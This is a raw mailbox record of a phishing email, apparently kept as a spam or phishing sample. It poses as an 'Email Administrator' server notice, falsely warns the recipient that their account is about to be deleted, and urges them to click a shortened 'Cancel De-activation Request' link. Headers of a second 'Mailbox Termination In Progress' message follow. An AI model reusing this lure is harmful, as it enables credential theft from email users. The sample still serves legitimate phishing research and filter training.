From: "Administator" <admin@katekarkg.nazwa.pl >
Date: Sun, 11 Jun 2017 14:14:57 +0000
Message-Id: <20170611141458.46E37D1628DE@katekarkg.nazwa.pl>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 218

You will not see this in a MIME-aware mail reader.
--===============0546123258==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   =

 =

   Server Message
  =


 =

   Dear jose@monkey.org    Request to delete your E-mail account has been r=
eceived; request is under process.
 If request was made in error and you are not aware, immediately cancel the=
 request now

  =

   =

    Cancel De-activation Request
  =

   =

   However, if you do not cancel this request,  your account will be de-act=
ivated shortly =

and all your email data will be lost permanently. Regards.
Email Administrator

  =

   =

    =

 =

   =

   This message is auto-generated from E-mail security server, and replies =
sent to this email can not be delivered. =

This email is meant for: jose@monkey.org
 =




--===============0546123258==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P>
<TABLE style=3D"FONT-SIZE: small; FONT-FAMILY: arial, sans-serif; WHITE-SPA=
CE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; C=
OLOR: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPAC=
ING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-var=
iant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-widt=
h: 0px; text-decoration-style: initial; text-decoration-color: initial" cel=
lSpacing=3D0 width=3D"100%">
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#045fb4=
 height=3D110><BR class=3DApple-interchange-newline>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px"><FONT color=3D#ff=
ffff size=3D+4 face=3Dcalibri>Server Message</FONT></TD></TR></TBODY></TABL=
E></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#f8f8f8=
><BR><BR>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px"><FONT size=3D+2 f=
ace=3Dcalibri><B>Dear<SPAN class=3Dm_-7259872805470035008m_-242412846167231=
1614m_461365982045451214m_-8501769303810823940gmail-m_-3548811873217676187g=
mail-m_-1720100905897608783m_7125228170320741607Apple-converted-space>&nbsp=
;</SPAN><A style=3D"COLOR: rgb(17,85,204)">jose@monkey.org</A></B></FONT>&n=
bsp; &nbsp;
<P><FONT size=3D3 face=3Dcalibri>Request to delete your E-mail account has =
been received; request is under process.</FONT></P>
<P><FONT size=3D3 face=3Dcalibri>If request was made in error and you are n=
ot aware, immediately cancel the request now</FONT></P></TD></TR></TBODY></=
TABLE></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#f8f8f8=
 height=3D15></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#f8f8f8>
<TABLE height=3D60 width=3D"80%" align=3Dcenter bgColor=3D#045fb4>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<DIV align=3Dcenter><A style=3D"COLOR: rgb(17,85,204); text-decoration-line=
: none" href=3D"http://tinyurl.com/y8wrtvn9?email=3Djose@monkey.org" target=
=3D_blank data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=
=3Dhttp://tinyurl.com/y8wrtvn9email%3Dstaker006@gmail.com&amp;source=3Dgmai=
l&amp;ust=3D1496998656622000&amp;usg=3DAFQjCNG5gnj0aBhkWISnjo2edh7XkJONIQ" =
data-saferedirectreason=3D"5"><FONT color=3D#ffffff size=3D+2 face=3Dcalibr=
i>Cancel De-activation Request</FONT></A></DIV></TD></TR></TBODY></TABLE></=
TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#f8f8f8=
 height=3D20></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#f8f8f8=
 height=3D70>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px"><FONT size=3D3 fa=
ce=3Dcalibri>However, if you do not cancel this request,&nbsp; your account=
 will be de-activated shortly<SPAN class=3Dm_-7259872805470035008m_-2424128=
461672311614m_461365982045451214m_-8501769303810823940gmail-m_-354881187321=
7676187gmail-m_-1720100905897608783m_7125228170320741607Apple-converted-spa=
ce>&nbsp;</SPAN><BR>and all your email data will be lost permanently.</FONT>
<P><FONT size=3D3 face=3Dcalibri>Regards.<BR><B>Email Administrator</B></FO=
NT></P></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#f8f8f8=
 height=3D10></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#f8f8f8>
<TABLE height=3D10 width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<HR align=3Dcenter width=3D"100%">
</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#f8f8f8>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px"><FONT size=3D2 fa=
ce=3Dcalibri>This message is auto-generated from E-mail security server, an=
d replies sent to this email can not be delivered.<SPAN class=3Dm_-72598728=
05470035008m_-2424128461672311614m_461365982045451214m_-8501769303810823940=
gmail-m_-3548811873217676187gmail-m_-1720100905897608783m_71252281703207416=
07Apple-converted-space>&nbsp;</SPAN><BR>This email is meant for:<SPAN clas=
s=3Dm_-7259872805470035008m_-2424128461672311614m_461365982045451214m_-8501=
769303810823940gmail-m_-3548811873217676187gmail-m_-1720100905897608783m_71=
25228170320741607Apple-converted-space>&nbsp;</SPAN><B><FONT color=3D#045fb=
4><A style=3D"COLOR: rgb(17,85,204)">jose@monkey.org</A></FONT></B></FONT><=
/TD></TR></TBODY></TABLE></TD></TR>
<TR></TR></TBODY></TABLE><BR class=3DApple-interchange-newline></P></BODY><=
/HTML>
--===============0546123258==--

From jose@monkey.org Mon Jun 12 11:07:07 2017 +0000
Return-Path: oyshiqul.haque@hrcigw.com
Delivered-To: jose@monkey.org
X-FDA: 72943118094.23.hat61_5b138285a3d33
X-Spam-Summary: 20,1.5,0,d39f6b3a385ce386,d41d8cd98f00b204,oyshiqul.haque@hrcigw.com,:oyshiqul.haque@hrcigw.com,RULES_HIT:2:41:72:355:379:474:475:962:967:969:973:978:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1535:1560:1575:1588:1589:1592:1594:1714:1719:1730:1749:1777:1792:2194:2199:2525:2560:2563:2682:2685:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3622:3690:3740:3865:3867:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4049:4119:4321:4552:5007:6261:6671:6684:6687:7652:7809:8599:8603:8825:9025:9040:9059:9388:9411:9416:9468:9908:10004:10249:10346:11256:11473:11651:11658:11896:11914:12043:12438:12517:12519:12555:12561:12740:12776:12895:12903:12986:13007:13139:13235:13237:13439:13898:14096:14651:21080:21433:21436:21451:21483:21627:30026:30051:30054:30070:30083,0,RBL:182.16.156.58:@hrcigw.com:.lbl8.mailshell.net-62.8.38.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,Doma
X-HE-Tag: hat61_5b138285a3d33
X-Filterd-Recvd-Size: 8561
Received: from mx.hrcigw.com (mx.hrcigw.com [182.16.156.58])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 12 Jun 2017 11:07:05 +0000 (UTC)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mx.hrcigw.com (Postfix) with ESMTP id BDAD51656D2;
	Mon, 12 Jun 2017 16:31:38 +0600 (BDT)
X-Virus-Scanned: amavisd-new at hrcigw.com
Received: from mx.hrcigw.com ([127.0.0.1])
	by localhost (mx.hrcigw.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id FihXGubOQkh8; Mon, 12 Jun 2017 16:31:37 +0600 (BDT)
Received: from [192.168.0.125] (unknown [129.56.10.3])
	by mx.hrcigw.com (Postfix) with ESMTPSA id 67412164D36;
	Mon, 12 Jun 2017 16:30:49 +0600 (BDT)
Content-Type: multipart/alternative; boundary="===============1673434456=="
MIME-Version: 1.0
Subject: Mailbox Termination In Progress
To: Recipients <oyshiqul.haque@hrcigw.com>
